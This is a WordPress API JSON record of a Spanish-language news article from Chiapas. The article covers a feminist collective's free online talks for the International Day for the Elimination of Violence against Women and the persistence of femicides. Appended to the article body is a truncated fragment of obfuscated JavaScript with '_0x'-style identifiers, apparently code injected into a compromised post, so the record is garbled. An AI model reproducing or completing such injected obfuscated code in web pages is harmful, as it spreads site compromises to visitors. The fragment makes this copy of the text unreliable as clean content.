{"id":12659,"date":"2023-11-16T01:57:12","date_gmt":"2023-11-16T01:57:12","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12659"},"modified":"2023-11-16T01:57:13","modified_gmt":"2023-11-16T01:57:13","slug":"insuficientes-avances-para-erradicar-la-violencia-contra-la-mujer","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12659","title":{"rendered":"Insuficientes avances para erradicar la violencia contra la mujer"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"724\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-15-at-1.11.44-PM-1-724x1024.jpeg\" alt=\"\" class=\"wp-image-12660\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-15-at-1.11.44-PM-1-724x1024.jpeg 724w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-15-at-1.11.44-PM-1-212x300.jpeg 212w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-15-at-1.11.44-PM-1-768x1087.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-15-at-1.11.44-PM-1.jpeg 1080w\" sizes=\"auto, (max-width: 724px) 100vw, 724px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal25 de Noviembre del 2023. San Crist\u00f3bal de Las Casas-. A pesar de que se cuenta con una Ley General Libre de Violencia para la Mujer, las estad\u00edsticas indican que al d\u00eda asesinan a dos mujeres, por lo que es necesario seguir impulsado pol\u00edticas p\u00fablicas orientadas a erradicar este problema social, se\u00f1al\u00f3 Nadia L\u00f3pez Velasco, coordinadora de la Colectiva Feminista Mujeres de Los Altos.En entrevista, anunci\u00f3 que en el marco del D\u00eda Internacional de la Eliminaci\u00f3n de la Violencia contra la Mujer, la Colectiva Feminista Mujeres de Los Altos realizar\u00e1 una serie de jornadas feministas virtuales, &#8220;somos una Colectiva fundada hace 6 a\u00f1os y estamos haciendo activismo pol\u00edtico feminista y nos parece importante tener encuentros como este para retroalimentarnos entre feministas, para hacer un colectivo y m\u00e1s mujeres puedan acceder a informaci\u00f3n y a una serie de herramientas para que la eliminaci\u00f3n de la violencia a la mujer sea palpable&#8221;.&#8221;Van a participar 5 ponentes, del 15 al 23 de noviembre, estar\u00e1 Samantha Pe\u00f1a con una pl\u00e1tica enfocada a los derechos sexuales de las mujeres, el 16 estar\u00e9 compartiendo un tema yo que habla sobre la politizaci\u00f3n de nuestras vivencias privadas, luego estar\u00e1 la compa\u00f1era Andrea G\u00f3mez que es una gran activista, el d\u00eda 20 estar\u00e1 Camila Peralta, ella nos va compartir el tema de organizaci\u00f3n Feminista dentro de las universidades, luego estar\u00e1 Gloria Gonz\u00e1lez que hablar\u00e1 sobre el tejido colectivo, y para finalizar Lupita Couti\u00f1o, el objetivo es ir haciendo un abanico de herramientas que nos ayude a erradicar la violencia hacia la mujer&#8221;, agreg\u00f3.Asimismo, consider\u00f3 que mucho de lo que pasa en estos momentos en la vida p\u00fablica del pa\u00eds, en la pol\u00edtica partidista, tiene mucho que ver el movimiento feminista &#8220;y tiene que ver con las conciencias que hemos tratado de colectivizar desde hace siglos y que desde 2018 increment\u00f3 la convocatoria, el movimiento ha sido de gran trascendencia para lo que hacen ahora los tres niveles de gobierno&#8221;.&#8221;Creo que ni siquiera podemos hablar de que las heridas hayan sido atendidas, hay avances, hay una Ley  General para una Vida Libre de Violencia, hay muchas cosas en las que se han avanzado, pero siguen asesinando a dos mujeres al d\u00eda. Las ponencias son de 6 de la tarde a 7:30 de la noche el acceso es libre, es mero activismo digital, la mujer que quiera inscribirse no va pagar nada&#8221;, finaliz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal25 de Noviembre del 2023. San Crist\u00f3bal de Las Casas-. A pesar de que se cuenta con una Ley General Libre de Violencia para la Mujer, las estad\u00edsticas indican que al d\u00eda asesinan a dos mujeres, por lo que es necesario seguir impulsado pol\u00edticas p\u00fablicas orientadas a erradicar este problema social, se\u00f1al\u00f3 Nadia L\u00f3pez &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12660,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-12659","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12659","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12659"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12659\/revisions"}],"predecessor-version":[{"id":12661,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12659\/revisions\/12661"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12660"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12659"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12659"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12659"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}